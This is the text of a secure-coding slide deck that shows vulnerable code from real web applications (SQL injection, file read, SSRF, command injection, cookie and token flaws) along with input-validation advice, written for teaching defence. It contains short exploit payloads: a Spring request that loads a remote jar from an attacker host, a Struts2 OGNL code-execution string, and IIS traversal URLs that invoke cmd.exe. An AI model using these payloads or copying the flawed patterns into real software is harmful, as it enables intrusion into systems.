DON’T TRY THIS AT HOME
Some of the code examples in this presentation
may shock even the strongest of developers.
If you are faint of heart, or don’t like a good laugh,
then it may pay to leave the room...... No really...
JAVA
PERL
PHP
PYTHON
ASP
FLASH
C#
C, C++
VB.Net
CFML
All Languages Can Lead To Security Vulnerabilities
Security Vulnerability
Abritrary Graph Of Statistics Of Vulnerabilities
3rd Hit Is A
Vulnerability In A
Graph Application
And Its SQL
Injection
Have I Mentioned
2010 Yet?
Abritrary Graph Of Statistics Of Vulnerabilities
http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Abritrary Graph Of Statistics Of Vulnerabilities
http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Abritrary Graph Of Statistics Of Vulnerabilities
Huh?
http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Apologies
The code you are about to see comes
from real applications,
only the variable names have
been changed to protect the
guilty.
If this code resembles yours, you may
want to take notes...
What's Wrong With This Picture
if (!string.IsNullOrEmpty(
Request.QueryString["Eid"]))
Data Access
Through
Framework
CMSMain.WhereCondition =
"TitleID IN (SELECT TitleID FROM
CMS_Documents WHERE EID = " +
Request.QueryString["Eid"] + ")“;
Frameworks Don’t Always Protect You
Frameworks Segway....
Framework Bugs
Spring Framework
Spring Framework execution of arbitrary code
http://blog.o0o.nu/2010/06/cve-2010-1622.html
Any Form Controller
POST /adduser HTTP/1.0
...
class.classLoader.URLs[0]=
jar:http://attacker/spring-exploit.jar!/
Overwrite The WebappClassLoader URL With An Arbitrary Remote Jar
Framework Bugs
Struts2/XWork Framework
Struts2 Framework execution of arbitrary code
http://blog.o0o.nu/2010/07/cve-2010-1870struts2xwork-remote.html
http://mydomain/MyStruts.action?
('\u0023_memberAccess[\'allowStaticMethodAc
cess\']')(meh)=true&(aaa)
(('\u0023context[\'xwork.MethodAccessor.den
yMethodExecution\']\u003d\u0023foo')(\u0023
foo\u003dnew%20java.lang.Boolean("false")))
&(asdf)
Execute Arbitrary Java Code
(('\u0023rt.exit(1)')
(\u0023rt\u003d@java.lang.Runtime@getRunti
me()))=1
OWASP Top 10
“Lets make a list...”
Trusting Filenames From The User
Image Loader
Called via pages to display images
Passed an image name in the URL
public void ProcessRequest(HttpContext
context)
{
string ImageUrl =
context.Request.QueryString["ImageUrl"];
..
context.Response.WriteFile(ImageUrl);
}
Retrieve Arbitrary File From Server
Trusting URLS From The User
Help System Page Loader
Called to load help contents from other server
Passed a page reference in the URL
public byte[] GetBytesFromUrl(string url)
{
Make Internal Network Requests
HttpWebRequest myReq =
WebRequest.Create(url);
var webResponse =
webRequest.GetResponse();
using (var responseStream =
webResponse.GetResponseStream())
{
return responseStream.ToBytes();
}
}
Using 302 Redirect As Security Measure
Making Unauthenticated Request
Results in a 302 redirect to the login page
HTTP/1.1 302 Found
Location: /admin/login
Content-Type: text/html; charset=utf-8
Content-Length: 13226
That Seems Suspiciously
Large
<html><head><title>Object
moved</title></head><body>
<h2>Object moved to <a
href="/admin/login">here</a>.</h2>
</body></html>
Using 302 Redirect As Security Measure
HTTP/1.1 302 Found
Location: /admin/login
Content-Type: text/html; charset=utf-8
Content-Length: 13226
<html><head><title>Object
moved</title></head><body>
Oh there it is.
<h2>Object moved to <a
href="/admin/login">here</a>.</h2>
</body></html>
<html>
<head id="_ctl1_Head1"><title>
File Upload
</title><link href=“
Things that work
Things that DO NOT work
Posting the CAPTCHA answer and response
Posting the CAPTCHA ‘id’ and response
POST /captcha HTTP/1.0
answer=kbpsh&response=kbpsh....
Using HTML to display the CAPTCHA ‘word’
Using HTML to display a mathematical equation to solve
<html>
Please type in these letters: kbpsh
</html>
Shopping Cart Troubles
Usual Shopping Process
Shopping Cart Troubles
My Shopping Process
Add To Cart Contents After
Payment Processed
Flash Accepts User Input
Image Loader
Flash loaded by HTML page
HTML page sets parameters
Can Be Set Via URL Parameters
private var imgPath:String;
imgPath = "http://localhost/sample.jpg" :
img = this.loaderInfo.parameters.img;
img_holder = new Image(imgPath);
Flash Movie Host On Your Site, Loading
Images From Attackers Site
Cross System Data Truncation
Forgotten Password Feature
Page accepts email address and checks it is valid
strEmail = Request.Form("txtemail")
If strEmail <> "" Then
objQRY.ClearParameters
objQRY.AddParameter "@email",
trim(strEmail)
Calls A Stored Procedure
set rsLogin =
objQRY.ReturnRS("spUserMatch")
Cross System Data Truncation
Forgotten Password Feature
Stored procedures does a user lookup
CREATE PROCEDURE [dbo].[spUserMatch]
@email varchar(100) = null
...
Truncates Input To 100 Characters
Cross System Data Truncation
Forgotten Password Feature
If user exists, send email with new password
Set Mailer =
Server.CreateObject("SMTPsvg.Mailer")
Mailer.Subject = "New Password"
Mailer.BodyText = strBody
Mailer.Recipient = strEmail
Attacker Receives Copy Of Email
Uses The Original Input
(Non Truncated)
<valid email address><100 spaces>;<attacker email address>
Cookie Data Serialisation
Object Serialised
Base64 encoded and stored as cookie
// create map
java.util.HashMap map = new java.util.HashMap();
map.put("UserId", UserId);
map.put("email", email);
// Serialise and B64 it
String info = java.net.URLEncoder.encode(new
String(org.apache.commons.codec.binary.Base64.encode
Base64(buffer.toByteArray()),"UTF-8"),"UTF-8");
// Store it in cookie
org.apache.cocoon.environment.http.HttpCookie cookie
= new
org.apache.cocoon.environment.http.HttpCookie("SESSI
ON", info);
Cookie Data Serialisation
Object Is Stored Insecurely In Cookie
Base64 is not encryption
Cookie Data Can Be Decoded
And modified
And recoded
And sent back
Application Deserialises It
And trusts it
And attacker gains access as another userID
Lets Not Leave Out PHP
Execute System() With User Supplied Input
This was for real.... In a ‘security’ appliance used by .mil
if ($_GET["cmd"] == "TERMEND") {
$sid = $_GET["param"];
$cmd = "/var/www/htdocs/utt/Queue.pl
delete_message_queue $sid";
system($cmd);
Did I Mention That It Was
Unauthenticated Access
Cookies
Well, This Sure Looks Useful
void CheckLoginCount() {
HttpCookie cookie =
Request.Cookies["LoginAttempts"];
if (cookie != null)
{
int attempts = cookie.Value;
if (attempts >= 5)
Redirect("~/AccessDenied.aspx”);
}
}
More Cookies
Remember Me Functionality
User selects remember me
Application generates random token
Stores token in cookie, and in database
$token = substr(md5(uniqid(rand(), true)),
0, 49 - strlen($this->ID));
$this->RememberLoginToken = $token;
Cookie::set('rem_me', $this->ID . ':' .
$token);
More Cookies
Remember Me Functionality
User selects to logout
Application sets token to null
Stores null in cookie, and in database
$this->RememberLoginToken = null;
Cookie::set('rem_enc', null);
More Cookies
Remember Me Functionality
If the user doesn’t logout they use the autologin feature
Application loads user based on cookie value
Application checks the $tokens match
list($uid, $token) =
explode(':', Cookie::get(‘rem_me'), 2);
$a_uid = Convert::raw2sql($uid);
$user = DataObject::
get_one(“User", “User.ID = '$a_uid'");
if($user && $user->RememberLoginToken != $token) {
$member = null;
}
What Happens If $token is empty
(null)
Evil Users
Never Trust User Supplied Input
No really, users are evil
And Hands Leap Out Of Matrix
Style Backgrounds
Input Validation
Input Validation Is The Key
No I didn’t say ‘silver bullet’
Properly implemented can prevent most app vulns
Validate At Input
Validate all input to ensure if conforms to the required
format
Validate All Input
Text strings, Cookie values, HTTP headers
File data, Path names, URL values, Currency
Data from databases, 3rd parties, web services
Client Site Validation
Should only be used to reduce browser requests
Never rely on client side validation for security
Backend Validation
Validate the data
Ensure the user is authorised to access data records
Should not matter what values the user sends
Data Normalisation
Data Comes In Many Forms
“this is data”
%74%68%69%73%20%69%73%20%64%61%74%61
&#x74;&#x68;&#x69;&#x73;&#x20;&#x69;&#x73;&#x2
0;&#x64;&#x61;&#x74;&#x61;
“ThIs iS dAtA”
Many paths to the same location
/help.jsp?page=user/welcome.htm
/help.jsp?page=user/../admin/welcome.htm
/help.jsp?page=user\..\admin/welcome.htm
/help.jsp?page=user\/\/..//\\/admin/welcome.htm
/help.jsp?page=help.jsp
Data Decoding or Normalisation
Depending On Application
Decode or reject
Detect Encoded Data
Decode the data and compare to original
Decode Recursively To Its Lowest Form
Concatenation of paths
Multiple layers of encoding
Formalise Decoding Order
To prevent unintended decoding later in the application
Data Decoding And Validation FAIL
MS Extended Unicode vulnerability
/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
MS Double Decode vulnerability
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
NGINX Source Code Disclosure
http://www.example.com/file.php%20
Conforms
Ensure Data Conforms To Required Format
Check length, type, min() max() values
Alphanumeric only
Must be a valid date
Reject Bad Data
Do not attempt to fix it up
Easily leads to confusion
Use Data Whitelists
Checks against a list of known good values
Easier to know which values are good input
The recommended approach
Santise Data For Use
Data Will Be Used In Different Place
SQL, XML, Output, Log files
Requires Different Sanitisation
Remove meta chars
Remove special characters
Remove Linefeeds
Use Standard Formalised Reusable Code Blocks
Most languages contain these
OWASP supplies some
Homebrew stuff should be well tested and documented at
the start of development
When Filtering Goes Wrong
This Is Not Filtering
If (imageurl = “/web.config”) exit()
And Yes, XSS without <script> is possible
If (req.getParameter(‘name’) .indexOf("<script") > 0
exit()
Don’t Forget To Escape The Escape Character
input.Replace("+", "\\+").Replace("=", "\\=").Replace("(",
"\\(").Replace(")", "\\)")
.Replace("*", "\\*").Replace("&", "\\&").Replace("!",
"\\!").Replace("|","\\|"));
Back To The Code
Things To Try At Home
Review your own code
Conduct internal peer reviews
Have a set of standards, and stick to them
Grepping The Code
Looking for where user input is used
Looking for dangerous syntax use
Particular attention to ‘danger areas’ such as file upload
Review the stored procedures
Think Like An Attacker
Want to ‘break the code’
www.insomniasec.com